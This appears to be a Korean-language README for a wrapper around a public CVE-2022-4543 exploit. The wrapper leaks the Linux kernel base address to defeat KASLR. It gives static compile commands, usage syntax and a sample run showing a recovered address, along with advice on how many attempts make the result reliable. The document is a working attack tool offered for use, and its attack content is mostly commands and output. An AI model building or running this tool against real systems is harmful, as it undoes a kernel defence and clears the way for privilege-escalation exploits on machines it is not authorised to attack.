
CVE-2022-4543 익스플로잇을 위한 래퍼로, KASLR 우회를 통해 커널 베이스 주소의 무작위화를 해제하여 영향을 받는 Linux 시스템에서 안정적인 커널 익스플로잇을 가능하게 합니다.
이것은 willsroot의 CVE-2022-4543 익스플로잇의 래퍼로, 커널 베이스 주소를 판단하고 얻는 데 도움을 줍니다.
필요에 따라 (선택 사항):
gcc dekaslr.c --static -o dekaslr
g++ main.cpp --static -o main
일부 OS에서는 먼저 정적 libc를 설치하세요.
./main
[*] Usage: ./binary dekaslr_path entry_SYSCALL_64_offset(in hex) max_loop
$ ./main ./dekaslr 0x100000 200
ffffffffa2600000: 53/200
두 프로그램을 실행하면 오프셋에 기반하여 가장 빈번한 주소를 제공합니다.
실제로 실제 커널 베이스 주소는 전체 시도 중 1/4 이상 나타납니다. 100회 이상 시도를 권장합니다.